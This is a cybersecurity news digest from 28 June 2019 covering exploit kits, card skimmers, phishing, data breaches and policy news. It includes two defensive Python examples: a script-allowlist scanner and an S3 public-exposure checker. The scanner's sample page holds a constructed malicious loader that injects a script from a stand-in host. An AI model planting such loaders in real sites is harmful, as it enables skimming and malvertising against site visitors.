
Silobreaker Daily Cyber Digest – 28 June 2019



Ongoing Campaigns

Spelevo exploit kit targets Flash and Internet Explorer vulnerabilities

  • Researchers at Cisco Talos observed the Spelevo exploit kit being delivered via a compromised business-to-business site. The site was widely compromised: multiple pages, including the main homepage, redirected to the gate used for the campaign.
  • Once a connection to the gate is established the infection process starts. The initial landing page runs a reconnaissance phase, probing the operating system, web browser and plugin information. The kit then looks for vulnerable versions of Flash to exploit CVE-2018-15982, a use-after-free vulnerability in Flash Player, or targets CVE-2018-8174, a use-after-free vulnerability in the VBScript engine of Internet Explorer.
  • Once the system has been compromised, Spelevo drops the banking trojans IcedID and Dridex.

Source (Includes IOCs)


Regin malware used in espionage attack on Yandex

  • According to Reuters, Yandex, often referred to as ‘Russia’s Google,’ was targeted in an espionage attack between October and November 2018. Sources told Reuters that the hackers appeared to have been looking for technical information on how Yandex authenticates user accounts.
  • A Kaspersky assessment concluded that ‘hackers likely tied to Western intelligence breached Yandex.’ The attack is said to have involved Regin Trojan, a hacking tool known to be used by the so-called ‘Five Eyes’ intelligence sharing alliance (US, UK, Australia, New Zealand and Canada).



New Instagram phishing scam lures victims with promise of ‘verified account’ status

  • Sucuri researchers came across the page Instagramforbusiness[.]info masquerading as a real Instagram verification submission page, which contains a link that redirects to a series of phishing forms where users are prompted to enter their Instagram credentials.



Highly customizable Inter skimmer observed stealing card details

  • Researchers at Fortinet observed a new campaign on April 19th, 2019, using a skimmer named ‘Inter’. They found a malicious JavaScript connecting to a site disguised as a visitor traffic tracker. The domain contained more than 11 open directories and over 70 skimmer scripts, which were being updated as recently as June 20th, 2019.
  • The identified scripts can be categorised as loaders, web skimmers and fake payment forms. The loader scripts fetch the next stage from one of the campaign’s C2 servers, which serves either the web skimmer or a fake payment form; which script is served depends on the payment service provider the website uses. Attackers customise the scripts to inject forms specifically into the payment page of the compromised website.
  • The researchers emphasised the customisable features of the Inter skimmer, which allow the group behind the campaign to target a wide range of websites and payment vendors. Additionally, they warned that Inter’s availability and ease of use mean that it can be used by ‘just about anyone’.

Source (Includes IOCs)


ShadowGate now targets a global audience with updated GreenFlash Sundown exploit kit

  • Researchers at Trend Micro detected new activity from the ShadowGate group in which an upgraded version of the GreenFlash Sundown exploit kit is used to deliver a Monero miner.
  • Victims are redirected to the exploit kit after visiting websites that carry malicious advertisements served from compromised ad servers. The exploit kit then infects them with the cryptocurrency miner.
  • According to the researchers, this activity also demonstrates the threat actor’s shift from targeting East Asia to targeting global victims.

Source (Includes IOCs)


Researchers detect ‘fake jquery’ campaign leading to malvertising and ad fraud schemes

  • Malwarebytes Labs researchers detected new domains used by an old malware campaign known as ‘fake jquery’. The campaign involves thousands of sites, mainly running outdated content management systems, injected with a jQuery lookalike script. The malicious JavaScript initially appears blank, but the researchers found that the script redirects to malicious domains.
  • Users are redirected to different sites depending on their location and the device they are using. The campaign is heavily geared towards mobile users and redirects them to sites that download apps containing trojans which display full-screen ads. According to the researchers, the ultimate goal is to monetise these full-screen adverts.

Source (Includes IOCs)
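Both the ‘fake jquery’ injections above and the Inter loader scripts described earlier share one mechanism: a <script> tag (or an inline loader that creates one) pointing at a host the site owner never chose. The check below is an added example for this digest, not code from Malwarebytes, Fortinet or the campaigns they describe. It parses a page with the Python standard library, lists every script host it references, and flags those outside an allowlist, calling out sources that are named like jQuery but not served from the real CDN. The allowlist, the hosts and the sample page are constructed for the example.

```python
"""Flag <script> tags that pull code from hosts outside an allowlist.

Added example for this digest, not code from Malwarebytes, Fortinet or the
campaigns they describe. The allowlist and the sample page are constructed.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed allowlist for a hypothetical shop: its own origin plus the real jQuery CDN.
ALLOWED_HOSTS = {"shop.example", "code.jquery.com"}

# Loader scripts typically build a <script> element at runtime.
LOADER_MARKERS = ("createElement('script')", 'createElement("script")', "document.write(")
URL_RE = re.compile(r"""https?://[^\s'"<>]+""")


class _ScriptCollector(HTMLParser):
    """Collect external script sources and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.srcs = []
        self.inline = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.srcs.append(src.strip())
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


def _host(url):
    """Hostname of an absolute or protocol-relative URL; '' for relative paths."""
    return (urlparse(url).hostname or "").lower()


def find_suspicious_scripts(html, allowed_hosts=ALLOWED_HOSTS):
    """Return (host, url, reason) for each script reference not on the allowlist."""
    parser = _ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.srcs:
        host = _host(src)
        if not host or host in allowed_hosts:
            continue  # relative (same-origin) or an expected third-party host
        reason = "external script host not in allowlist"
        if "jquery" in host or "jquery" in urlparse(src).path.lower():
            reason += " (named like jQuery but not served from the real CDN)"
        findings.append((host, src, reason))
    for body in parser.inline:
        external = [u for u in URL_RE.findall(body) if _host(u) not in allowed_hosts]
        for url in external:
            findings.append((_host(url), url, "inline script loads from host not in allowlist"))
        if not external and any(m in body for m in LOADER_MARKERS):
            # Obfuscated loaders assemble the URL from pieces; surface them for review.
            findings.append(("", body.strip()[:60], "inline loader with no visible URL"))
    return findings


# Constructed sample page: real jQuery, a same-origin script, a lookalike
# 'jquery' host, and an inline loader that pulls a 'tracker' from another host.
SAMPLE_HTML = """
<html><head>
<script src="https://code.jquery.com/jquery-3.4.1.min.js"></script>
<script src="/static/checkout.js"></script>
<script src="//jquery-cdn.example/jquery.min.js"></script>
<script>
  var s = document.createElement('script');
  s.src = 'https://visitor-stats.example/track.js';
  document.head.appendChild(s);
</script>
</head><body><form id="payment"></form></body></html>
"""

if __name__ == "__main__":
    for host, url, reason in find_suspicious_scripts(SAMPLE_HTML):
        print(f"{host or '-':24} {reason}: {url}")
```

Run it against the HTML the server actually sends for the checkout page, not a cached copy, since both campaigns inject into the page on the compromised host. A clean run is not proof of a clean site: a loader can still fetch its URL from a data attribute or a string split across variables, which is why the last branch reports any inline script that creates script elements even when no URL is visible.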


Java-based ATM malware uses victim bank’s ATM software to cash out ATMs

  • Kaspersky researchers discovered the ATM malware, named ATMJaDi, in spring 2019. The malware was uploaded to a multiscanner service from Mexico and later from Colombia. The malware is highly targeted and only works on a small set of ATMs, because it calls the victim bank’s proprietary Java ATM software classes rather than the standard XFS, JXFS or CSC libraries.
  • The malware is controlled through a self-crafted HTTP server web interface and cannot be controlled via the ATM’s physical interface. Consequently, the researchers believe that the attackers also compromised the target bank’s infrastructure to gain access to the networks controlling the ATMs.

Source (Includes IOCs)


Azure App Service used to host an Amazon-themed phishing page

  • Netskope researchers detected an Amazon-themed phishing page hosted on the Azure App Service. The phishing page has been active since the first week of June.
  • The phishing page informed victims that their Amazon account was suspended and requested Amazon credentials and personal details such as credit card information, Social Security numbers, driver’s license information, email address and password, or mother’s maiden name.

Source (Includes IOCs)


Leaks and Breaches

PCM Inc data breach gave hackers access to clients’ email and file sharing systems

  • Security journalist Brian Krebs learned that the cloud solution provider PCM Inc discovered the intrusion in mid-May 2019. A source told Krebs that the attackers stole the Office 365 administrative credentials that PCM used to manage client accounts.
  • A security expert working for a PCM Inc customer said that the attackers seemed interested in stealing information to carry out gift card fraud.
  • PCM Inc declined to comment on the attack and instead released a statement claiming that there was ‘minimal-to-no impact to PCM customers’.



AIA fined SG$10,000 for data breach

  • The Singapore-based insurance company AIA has been fined SG$10,000 (£5,829) by the Personal Data Protection Commission for sending letters meant for 245 individuals to two of its customers between December 28th, 2017 and January 2nd, 2019. The letters contained personal information including policy numbers, premium accounts, full names and due dates of the recipients.
  • The company also suffered a second data breach in March 2019, exposing personal information of over 200 former and current agents.



Data management company Attunity exposed client data in cloud storage

  • UpGuard researchers discovered three publicly accessible Amazon S3 buckets belonging to the Israel-based data management company Attunity on May 13th, 2019. They have since been secured.
  • The exposed data includes sensitive information belonging to Attunity’s clients: full names, employment details, and possibly Social Security numbers. The leak also exposed system credentials and system information, which could have led to further compromise. Attunity’s clients include over two thousand enterprises and half of the Fortune 100.
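Publicly accessible storage of the kind reported here is usually the result of an ACL grant to one of the two global groups or a bucket policy whose principal is ‘*’. The check below is an added example for this digest, not UpGuard’s or Attunity’s tooling. It takes the two documents an operator can pull for any bucket (the ACL in the shape returned by boto3’s get_bucket_acl(), and the policy JSON returned by get_bucket_policy()) and lists every grant that opens the bucket to anyone. The bucket name, account ID and sample documents are constructed for the example.

```python
"""Check an S3 bucket's ACL and bucket policy for grants to the public.

Added example for this digest, not UpGuard's or Attunity's tooling. Inputs
have the shape of boto3 get_bucket_acl() output and a get_bucket_policy()
JSON document; the sample values are constructed and the bucket hypothetical.
"""
import json

ALL_USERS = "http://acs.amazonaws.com/groups/global/AllUsers"
AUTH_USERS = "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"


def acl_public_grants(acl):
    """Return (group, permission) for every ACL grant to AllUsers or AuthenticatedUsers.

    AuthenticatedUsers means any AWS account in the world, not 'our users',
    so it is treated as public here.
    """
    out = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        if grantee.get("Type") != "Group":
            continue
        uri = grantee.get("URI")
        if uri == ALL_USERS:
            out.append(("AllUsers", grant.get("Permission")))
        elif uri == AUTH_USERS:
            out.append(("AuthenticatedUsers", grant.get("Permission")))
    return out


def _principal_is_anyone(principal):
    """True for Principal "*" or {"AWS": "*"} (also when given inside a list)."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        aws = principal.get("AWS", [])
        return "*" in (aws if isinstance(aws, list) else [aws])
    return False


def policy_public_statements(policy):
    """Return Sids of Allow statements open to any principal without a Condition."""
    if isinstance(policy, str):
        policy = json.loads(policy)
    statements = policy.get("Statement", [])
    if isinstance(statements, dict):  # a single statement may be written without a list
        statements = [statements]
    out = []
    for i, stmt in enumerate(statements):
        if stmt.get("Effect") != "Allow" or not _principal_is_anyone(stmt.get("Principal")):
            continue
        if stmt.get("Condition"):
            # Conditioned grants are not flagged here; review them by hand, since a
            # condition such as aws:SecureTransport does not narrow *who* may call.
            continue
        out.append(stmt.get("Sid", f"statement[{i}]"))
    return out


def bucket_exposure(acl, policy):
    """Human-readable findings from both checks; an empty list means nothing public."""
    findings = [f"ACL grants {perm} to {group}" for group, perm in acl_public_grants(acl)]
    findings += [f"policy statement '{sid}' allows any principal"
                 for sid in policy_public_statements(policy)]
    return findings


# Constructed sample data for a hypothetical bucket 'example-backups'.
SAMPLE_ACL = {
    "Owner": {"ID": "owner-canonical-id"},
    "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": "owner-canonical-id"}, "Permission": "FULL_CONTROL"},
        {"Grantee": {"Type": "Group", "URI": ALL_USERS}, "Permission": "READ"},
    ],
}
SAMPLE_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "PublicList", "Effect": "Allow", "Principal": "*",
         "Action": "s3:ListBucket", "Resource": "arn:aws:s3:::example-backups"},
        {"Sid": "EtlWrite", "Effect": "Allow",
         "Principal": {"AWS": "arn:aws:iam::123456789012:role/etl"},
         "Action": "s3:PutObject", "Resource": "arn:aws:s3:::example-backups/*"},
        {"Sid": "VpcOnlyRead", "Effect": "Allow", "Principal": "*",
         "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-backups/*",
         "Condition": {"StringEquals": {"aws:SourceVpce": "vpce-0123456789abcdef0"}}},
    ],
})

if __name__ == "__main__":
    for line in bucket_exposure(SAMPLE_ACL, SAMPLE_POLICY):
        print(line)
```

The ACL READ grant to AllUsers is exactly what lets an anonymous client list and fetch objects; the ‘PublicList’ statement does the same through the policy. Object-level ACLs are not covered by this bucket-level check, so a bucket that passes can still contain individually public objects, and the account-wide Block Public Access setting is the control that makes both mistakes harmless.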



Key Biscayne, Florida, targeted in cyberattack

  • The village confirmed on June 27th, 2019 that it was affected by a ‘data security event’. The attack took place on June 23rd, 2019 and forced the village to shut down some computer operations.



MedicareSupplement[.]com exposes 5 million personal records via public database

  • Comparitech researchers and security researcher Bob Diachenko collaborated to uncover the publicly available MongoDB instance. The database appears to be part of MedicareSupplement[.]com’s marketing leads and was first indexed on May 10th, 2019.
  • The database contained personal details such as names, addresses, IP addresses, email addresses, marketing related information, and more. Additionally, about 239,000 records also ‘indicated insurance interest area’, such as cancer, life, auto, medical and supplemental insurance.
  • It is unknown if the database was accessed by unauthorized parties. Following correspondence with the researchers, MedicareSupplement[.]com disabled the database.




General News

Authorities call for vigilance following cyberattacks on Romanian medical institutions

  • Romanian authorities have called for vigilance by doctors and hospital administrators following a series of ransomware attacks on Romanian medical institutions. A total of nine Romanian hospitals have been hit by ransomware attacks within a week.
  • According to Bitdefender experts, the Maoloa ransomware and Phobos ransomware were used in the attacks. The attacks are believed to originate from China.



NCSC publishes joint report on publicly available hacking tools

  • The UK’s National Cyber Security Centre (NCSC) published a joint report detailing the malicious use of five publicly available hacking tools. The research was conducted by the cyber security authorities of Australia, Canada, New Zealand, the UK and the US.
  • The report covers the remote access trojan JBiFrost, the web shell China Chopper, the credential stealer Mimikatz, the lateral movement framework PowerShell Empire, and the C2 obfuscation tool HTran.



ENISA given permanent cybersecurity mandate and stronger powers

  • The EU Cybersecurity Act (CSA) came into effect on June 27th, 2019, giving the European Union Agency for Network and Information Security (ENISA) a permanent mandate and more resources to oversee cybersecurity issues in the EU.
  • The CSA also rebrands ENISA as the European Union Agency for Cybersecurity and establishes an EU-wide cybersecurity certification framework, which the agency will help member states coordinate at the Union level.



MoD performed searches on police national fingerprint database

  • The UK’s biometrics commissioner Paul Wiles expressed his concern over searches performed by the Ministry of Defence (MoD) on the police national fingerprint database. Wiles stated that the searches did not have a ‘clearly defined lawful basis’.
  • The MoD used the database to check whether fingerprints taken during military operations abroad matched persons known to UK police or immigration authorities.



Somerville, Massachusetts, bans facial recognition in public places

  • The Somerville City Council passed the ‘Face Surveillance Full Ban Ordinance’ on June 27th, 2019, which prohibits any ‘department, agency, bureau, and/or subordinate division of the City of Somerville’ from using facial recognition software.
  • Somerville becomes the second US city after San Francisco to ban the use of facial recognition software.



Germany and the Netherlands agree to build first-ever joint military internet

  • On June 26th, 2019, German and Dutch Defence Ministers signed an agreement to build a joint military internet, to be known as the Tactical Edge Networking (TEN), which will merge parts of both countries’ military networks. If proven successful, other NATO members’ military networks will be unified in the future.
  • The aim of a joint military internet is to develop and deploy new and improved joint standards across NATO states, allowing for better future cooperation.



Former Equifax executive sentenced for insider trading

  • Jun Ying, former chief information officer of Equifax, was sentenced to four months in prison for insider trading on June 27th, 2019. Ying was found guilty of selling over $950,000 worth of Equifax stock one and a half weeks before the company’s public data breach announcement. The Equifax data breach took place between May and July 2017 and exposed the personal data of over 145 million people.
  • This is the second case of an Equifax employee being convicted for insider trading relating to the same data breach.




The Silobreaker Team Disclaimer: Although Silobreaker has relied on what it regards as reliable sources while compiling the content herein, Silobreaker cannot guarantee the accuracy, completeness, integrity or quality of such content and no responsibility is accepted by Silobreaker in respect of such content. Readers must determine for themselves what reliance they should place on the compiled content herein.
